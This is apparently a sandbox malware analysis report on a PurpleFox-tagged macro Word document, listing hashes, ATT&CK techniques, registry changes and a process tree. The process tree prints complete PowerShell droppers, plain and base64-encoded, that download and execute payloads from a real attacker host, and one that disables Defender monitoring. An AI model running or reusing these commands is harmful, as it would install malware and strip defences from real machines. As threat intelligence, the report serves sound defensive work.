purplefox | 38f581881093c044667d565a698aa389f14585a58d5c8b692dc2be851293f1c2

Resubmissions

21/09/2023, 07:25

230921-h86p5sgc32 10

20/09/2023, 23:55

230920-3yrhpabc6y 10

Analysis

max time kernel
143s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
20/09/2023, 23:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ID-191304203986.docm
Size

44KB
MD5

8c498f9e6dd65c5a9704208922224661
SHA1

1dc2f872c2e23e1eb0c6090909c5807553ad1e75
SHA256

38f581881093c044667d565a698aa389f14585a58d5c8b692dc2be851293f1c2
SHA512

b6a5eceef6739421ed2f0f6a479df496ecb1894b7694651b24a50689d663b1d7f1b1bf58c2edacf6a2fa59908a58f25cd00e389765871cb1856acb3431bcca50
SSDEEP

768:T6D/hwDg0kIo+rQGtBMIYta9l87miNPZjinjUeipoRkqk:T6D/u801rQIBMNg86AB+njUpoqqk

Score

10^/10

purplefox discovery evasion rootkit trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/zKJFnbnzeum8/37d4fddb6bf2de6611c6655a5cd37972fc33642d/ace.jpg

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/T2qomNwfFUeS/62f331959dde379b2536caed26a74ae8460c0c30/all.png

Extracted

Language

ps1

Source

URLs

exe.dropper

http://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/5hwtrLyyHFiv/7b0985c861986ec9e2087ade8273e544009d68e1/SsdxxIp8DqeQ.jpg

Signatures

Detect PurpleFox MSI 1 IoCs

Detect PurpleFox MSI.

rootkit

resource	yara_rule
behavioral2/files/0x000700000001e5ab-120.dat	purplefox_msi

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	4392	2736	PowerShell.exe	68

PurpleFox
PurpleFox is an exploit kit used to distribute other malware families and first seen in 2018.
rootkit trojan purplefox

Blocklisted process makes network request 3 IoCs

flow	pid	Process
32	2936	powershell.exe
40	2012	powershell.exe
44	4840	msiexec.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Loads dropped DLL 5 IoCs

pid	Process
4168	MsiExec.exe
4168	MsiExec.exe
4168	MsiExec.exe
4168	MsiExec.exe
4168	MsiExec.exe

Modifies file permissions 1 TTPs 6 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4548	takeown.exe
1564	takeown.exe
4820	takeown.exe
4672	takeown.exe
4284	takeown.exe
4512	takeown.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe

Drops file in Windows directory 12 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\MSIB027.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB604.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB885.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB971.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\dbcode86mk.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIA8C3.tmp	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIB9DF.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIBA5D.tmp	msiexec.exe
File created	C:\Windows\.xml	msiexec.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3248	sc.exe
4132	sc.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Modifies data under HKEY_USERS 51 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	MsiExec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	MsiExec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1f	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings	MsiExec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	MsiExec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	MsiExec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings\JITDebug = "0"	MsiExec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	MsiExec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
2736	WINWORD.EXE
2736	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 16 IoCs

pid	Process
4392	PowerShell.exe
4392	PowerShell.exe
2936	powershell.exe
2936	powershell.exe
2012	powershell.exe
2012	powershell.exe
2012	powershell.exe
2012	powershell.exe
2012	powershell.exe
3308	powershell.exe
3308	powershell.exe
4840	msiexec.exe
4840	msiexec.exe
1848	powershell.exe
1848	powershell.exe
1848	powershell.exe

Suspicious use of AdjustPrivilegeToken 63 IoCs

description	pid	Process
Token: SeDebugPrivilege	4392	PowerShell.exe
Token: SeDebugPrivilege	2936	powershell.exe
Token: SeDebugPrivilege	2012	powershell.exe
Token: SeDebugPrivilege	3308	powershell.exe
Token: SeShutdownPrivilege	3308	powershell.exe
Token: SeIncreaseQuotaPrivilege	3308	powershell.exe
Token: SeSecurityPrivilege	4840	msiexec.exe
Token: SeCreateTokenPrivilege	3308	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	3308	powershell.exe
Token: SeLockMemoryPrivilege	3308	powershell.exe
Token: SeIncreaseQuotaPrivilege	3308	powershell.exe
Token: SeMachineAccountPrivilege	3308	powershell.exe
Token: SeTcbPrivilege	3308	powershell.exe
Token: SeSecurityPrivilege	3308	powershell.exe
Token: SeTakeOwnershipPrivilege	3308	powershell.exe
Token: SeLoadDriverPrivilege	3308	powershell.exe
Token: SeSystemProfilePrivilege	3308	powershell.exe
Token: SeSystemtimePrivilege	3308	powershell.exe
Token: SeProfSingleProcessPrivilege	3308	powershell.exe
Token: SeIncBasePriorityPrivilege	3308	powershell.exe
Token: SeCreatePagefilePrivilege	3308	powershell.exe
Token: SeCreatePermanentPrivilege	3308	powershell.exe
Token: SeBackupPrivilege	3308	powershell.exe
Token: SeRestorePrivilege	3308	powershell.exe
Token: SeShutdownPrivilege	3308	powershell.exe
Token: SeDebugPrivilege	3308	powershell.exe
Token: SeAuditPrivilege	3308	powershell.exe
Token: SeSystemEnvironmentPrivilege	3308	powershell.exe
Token: SeChangeNotifyPrivilege	3308	powershell.exe
Token: SeRemoteShutdownPrivilege	3308	powershell.exe
Token: SeUndockPrivilege	3308	powershell.exe
Token: SeSyncAgentPrivilege	3308	powershell.exe
Token: SeEnableDelegationPrivilege	3308	powershell.exe
Token: SeManageVolumePrivilege	3308	powershell.exe
Token: SeImpersonatePrivilege	3308	powershell.exe
Token: SeCreateGlobalPrivilege	3308	powershell.exe
Token: SeRestorePrivilege	4840	msiexec.exe
Token: SeTakeOwnershipPrivilege	4840	msiexec.exe
Token: SeRestorePrivilege	4840	msiexec.exe
Token: SeTakeOwnershipPrivilege	4840	msiexec.exe
Token: SeRestorePrivilege	4840	msiexec.exe
Token: SeTakeOwnershipPrivilege	4840	msiexec.exe
Token: SeRestorePrivilege	4840	msiexec.exe
Token: SeTakeOwnershipPrivilege	4840	msiexec.exe
Token: SeRestorePrivilege	4840	msiexec.exe
Token: SeTakeOwnershipPrivilege	4840	msiexec.exe
Token: SeRestorePrivilege	4840	msiexec.exe
Token: SeTakeOwnershipPrivilege	4840	msiexec.exe
Token: SeRestorePrivilege	4840	msiexec.exe
Token: SeTakeOwnershipPrivilege	4840	msiexec.exe
Token: SeShutdownPrivilege	2236	powercfg.exe
Token: SeCreatePagefilePrivilege	2236	powercfg.exe
Token: SeDebugPrivilege	1848	powershell.exe
Token: SeTakeOwnershipPrivilege	1564	takeown.exe
Token: SeTakeOwnershipPrivilege	4820	takeown.exe
Token: SeTakeOwnershipPrivilege	4672	takeown.exe
Token: SeTakeOwnershipPrivilege	4284	takeown.exe
Token: SeTakeOwnershipPrivilege	4512	takeown.exe
Token: SeTakeOwnershipPrivilege	4548	takeown.exe
Token: SeRestorePrivilege	4840	msiexec.exe
Token: SeTakeOwnershipPrivilege	4840	msiexec.exe
Token: SeRestorePrivilege	4840	msiexec.exe
Token: SeTakeOwnershipPrivilege	4840	msiexec.exe

Suspicious use of SetWindowsHookEx 14 IoCs

pid	Process
2736	WINWORD.EXE
2736	WINWORD.EXE
2736	WINWORD.EXE
2736	WINWORD.EXE
2736	WINWORD.EXE
2736	WINWORD.EXE
2736	WINWORD.EXE
2736	WINWORD.EXE
2736	WINWORD.EXE
2736	WINWORD.EXE
2736	WINWORD.EXE
2736	WINWORD.EXE
2736	WINWORD.EXE
2736	WINWORD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2736 wrote to memory of 4392	2736	WINWORD.EXE	89
PID 2736 wrote to memory of 4392	2736	WINWORD.EXE	89
PID 4392 wrote to memory of 2936	4392	PowerShell.exe	91
PID 4392 wrote to memory of 2936	4392	PowerShell.exe	91
PID 2936 wrote to memory of 2012	2936	powershell.exe	93
PID 2936 wrote to memory of 2012	2936	powershell.exe	93
PID 2012 wrote to memory of 3308	2012	powershell.exe	94
PID 2012 wrote to memory of 3308	2012	powershell.exe	94
PID 3308 wrote to memory of 2276	3308	powershell.exe	95
PID 3308 wrote to memory of 2276	3308	powershell.exe	95
PID 2276 wrote to memory of 2948	2276	csc.exe	96
PID 2276 wrote to memory of 2948	2276	csc.exe	96
PID 4840 wrote to memory of 4168	4840	msiexec.exe	99
PID 4840 wrote to memory of 4168	4840	msiexec.exe	99
PID 4840 wrote to memory of 4168	4840	msiexec.exe	99
PID 4840 wrote to memory of 4716	4840	msiexec.exe	100
PID 4840 wrote to memory of 4716	4840	msiexec.exe	100
PID 4840 wrote to memory of 4716	4840	msiexec.exe	100
PID 4716 wrote to memory of 2236	4716	MsiExec.exe	101
PID 4716 wrote to memory of 2236	4716	MsiExec.exe	101
PID 4716 wrote to memory of 2236	4716	MsiExec.exe	101
PID 4716 wrote to memory of 1848	4716	MsiExec.exe	103
PID 4716 wrote to memory of 1848	4716	MsiExec.exe	103
PID 4716 wrote to memory of 1848	4716	MsiExec.exe	103
PID 4716 wrote to memory of 1704	4716	MsiExec.exe	105
PID 4716 wrote to memory of 1704	4716	MsiExec.exe	105
PID 4716 wrote to memory of 1704	4716	MsiExec.exe	105
PID 4716 wrote to memory of 1756	4716	MsiExec.exe	108
PID 4716 wrote to memory of 1756	4716	MsiExec.exe	108
PID 4716 wrote to memory of 1756	4716	MsiExec.exe	108
PID 4716 wrote to memory of 3356	4716	MsiExec.exe	109
PID 4716 wrote to memory of 3356	4716	MsiExec.exe	109
PID 4716 wrote to memory of 3356	4716	MsiExec.exe	109
PID 4716 wrote to memory of 3780	4716	MsiExec.exe	111
PID 4716 wrote to memory of 3780	4716	MsiExec.exe	111
PID 4716 wrote to memory of 3780	4716	MsiExec.exe	111
PID 4716 wrote to memory of 1956	4716	MsiExec.exe	113
PID 4716 wrote to memory of 1956	4716	MsiExec.exe	113
PID 4716 wrote to memory of 1956	4716	MsiExec.exe	113
PID 4716 wrote to memory of 512	4716	MsiExec.exe	115
PID 4716 wrote to memory of 512	4716	MsiExec.exe	115
PID 4716 wrote to memory of 512	4716	MsiExec.exe	115
PID 4716 wrote to memory of 4160	4716	MsiExec.exe	117
PID 4716 wrote to memory of 4160	4716	MsiExec.exe	117
PID 4716 wrote to memory of 4160	4716	MsiExec.exe	117
PID 4716 wrote to memory of 3212	4716	MsiExec.exe	120
PID 4716 wrote to memory of 3212	4716	MsiExec.exe	120
PID 4716 wrote to memory of 3212	4716	MsiExec.exe	120
PID 4716 wrote to memory of 2220	4716	MsiExec.exe	122
PID 4716 wrote to memory of 2220	4716	MsiExec.exe	122
PID 4716 wrote to memory of 2220	4716	MsiExec.exe	122
PID 4716 wrote to memory of 5108	4716	MsiExec.exe	124
PID 4716 wrote to memory of 5108	4716	MsiExec.exe	124
PID 4716 wrote to memory of 5108	4716	MsiExec.exe	124
PID 4716 wrote to memory of 1560	4716	MsiExec.exe	126
PID 4716 wrote to memory of 1560	4716	MsiExec.exe	126
PID 4716 wrote to memory of 1560	4716	MsiExec.exe	126
PID 4716 wrote to memory of 4348	4716	MsiExec.exe	128
PID 4716 wrote to memory of 4348	4716	MsiExec.exe	128
PID 4716 wrote to memory of 4348	4716	MsiExec.exe	128
PID 4716 wrote to memory of 3344	4716	MsiExec.exe	130
PID 4716 wrote to memory of 3344	4716	MsiExec.exe	130
PID 4716 wrote to memory of 3344	4716	MsiExec.exe	130
PID 4716 wrote to memory of 2576	4716	MsiExec.exe	132

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ID-191304203986.docm" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2736
- C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe
  PowerShell -nop -exec bypass -w hidden -Enc DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMQAwADAAOwAkAGkAKwArACkADQAKAHsADQAKAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAG4AbwBwACAALQBlAHgAZQBjACAAYgB5AHAAYQBzAHMAIAAtAGMAIAAiAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAGIAbABhAGMAawAtAHMAdQBuAC0AYQAzADMANQAuAGEAcwB5AG8AcgBmAHAAbABtAG4AdgAuAHcAbwByAGsAZQByAHMALgBkAGUAdgAvAG0AbgB3AE8ARABCAHAAdABLADYAagBVAC8AegBLAEoARgBuAGIAbgB6AGUAdQBtADgALwAzADcAZAA0AGYAZABkAGIANgBiAGYAMgBkAGUANgA2ADEAMQBjADYANgA1ADUAYQA1AGMAZAAzADcAOQA3ADIAZgBjADMAMwA2ADQAMgBkAC8AYQBjAGUALgBqAHAAZwAnACkAIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgADEAOAAwAA0ACgB9AA0ACgA=
  2⤵
  - Process spawned unexpected child process
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4392
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/zKJFnbnzeum8/37d4fddb6bf2de6611c6655a5cd37972fc33642d/ace.jpg')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2936
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -w hidden -Enc DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMQAwADAAOwAkAGkAKwArACkADQAKAHsADQAKAHMAYQBsACAAYQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAOwBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwAkAGcAPQBhACAAUwB5AHMAdABlAG0ALgBEAHIAYQB3AGkAbgBnAC4AQgBpAHQAbQBhAHAAKAAoAGEAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBPAHAAZQBuAFIAZQBhAGQAKAAiAGgAdAB0AHAAOgAvAC8AYgBsAGEAYwBrAC0AcwB1AG4ALQBhADMAMwA1AC4AYQBzAHkAbwByAGYAcABsAG0AbgB2AC4AdwBvAHIAawBlAHIAcwAuAGQAZQB2AC8AbQBuAHcATwBEAEIAcAB0AEsANgBqAFUALwBUADIAcQBvAG0ATgB3AGYARgBVAGUAUwAvADYAMgBmADMAMwAxADkANQA5AGQAZABlADMANwA5AGIAMgA1ADMANgBjAGEAZQBkADIANgBhADcANABhAGUAOAA0ADYAMABjADAAYwAzADAALwBhAGwAbAAuAHAAbgBnACIAKQApADsAJABvAD0AYQAgAEIAeQB0AGUAWwBdACAAMgA1ADYAMAA7ACgAMAAuAC4AMwAxACkAfAAlAHsAZgBvAHIAZQBhAGMAaAAoACQAeAAgAGkAbgAoADAALgAuADcAOQApACkAewAkAHAAPQAkAGcALgBHAGUAdABQAGkAeABlAGwAKAAkAHgALAAkAF8AKQA7ACQAbwBbACQAXwAqADgAMAArACQAeABdAD0AKABbAG0AYQB0AGgAXQA6ADoARgBsAG8AbwByACgAKAAkAHAALgBCAC0AYgBhAG4AZAAxADUAKQAqADEANgApAC0AYgBvAHIAKAAkAHAALgBHACAALQBiAGEAbgBkACAAMQA1ACkAKQB9AH0AOwBJAEUAWAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABvAFsAMAAuAC4AMgA1ADEAMgBdACkAKQA7AE0AcwBpAE0AYQBrAGUAIABoAHQAdABwADoALwAvAGIAbABhAGMAawAtAHMAdQBuAC0AYQAzADMANQAuAGEAcwB5AG8AcgBmAHAAbABtAG4AdgAuAHcAbwByAGsAZQByAHMALgBkAGUAdgAvAG0AbgB3AE8ARABCAHAAdABLADYAagBVAC8ANQBoAHcAdAByAEwAeQB5AEgARgBpAHYALwA3AGIAMAA5ADgANQBjADgANgAxADkAOAA2AGUAYwA5AGUAMgAwADgANwBhAGQAZQA4ADIANwAzAGUANQA0ADQAMAAwADkAZAA2ADgAZQAxAC8AUwBzAGQAeAB4AEkAcAA4AEQAcQBlAFEALgBqAHAAZwA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgADEAOAAwAA0ACgB9AA0ACgA=
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2012
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -EncodedCommand DQAKAFMAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEQAaQBzAGEAYgBsAGUAUgBlAGEAbAB0AGkAbQBlAE0AbwBuAGkAdABvAHIAaQBuAGcAIAAkAHQAcgB1AGUADQAKAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAiACQAZQBuAHYAOgB3AGkAbgBkAGkAcgAiAA0ACgAkAFIAZQBnAGsAZQB5AHAAYQB0AGgAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXAA3AC0AWgBpAHAAIgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABQAEYAOAA4AGQATgBjAGQAcwBEAEQAcQBlADcAWgBmAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAaQAuAGQAbABsACIALAAgAEMAaABhAHIAUwBlAHQAPQBDAGgAYQByAFMAZQB0AC4AQQB1AHQAbwApAF0ADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATQBzAGkASQBuAHMAdABhAGwAbABQAHIAbwBkAHUAYwB0ACgAcwB0AHIAaQBuAGcAIABwAGEAYwBrAGEAZwBlAFAAYQB0AGgALAAgAHMAdAByAGkAbgBnACAAYwBvAG0AbQBhAG4AZABMAGkAbgBlACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAGkALgBkAGwAbAAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABNAHMAaQBTAGUAdABJAG4AdABlAHIAbgBhAGwAVQBJACgAaQBuAHQAIABkAHcAVQBJAEwAZQB2AGUAbAAsACAASQBuAHQAUAB0AHIAIABwAGgAVwBuAGQAKQA7AA0ACgB9AA0ACgAiAEAADQAKAGQAbwANAAoAewANAAoAJABtAHMAaQBwAGEAdABoAEEAIAA9ACAAIgBoAHQAdABwADoALwAvAGIAbABhAGMAawAtAHMAdQBuAC0AYQAzADMANQAuAGEAcwB5AG8AcgBmAHAAbABtAG4AdgAuAHcAbwByAGsAZQByAHMALgBkAGUAdgAvAG0AbgB3AE8ARABCAHAAdABLADYAagBVAC8ANQBoAHcAdAByAEwAeQB5AEgARgBpAHYALwA3AGIAMAA5ADgANQBjADgANgAxADkAOAA2AGUAY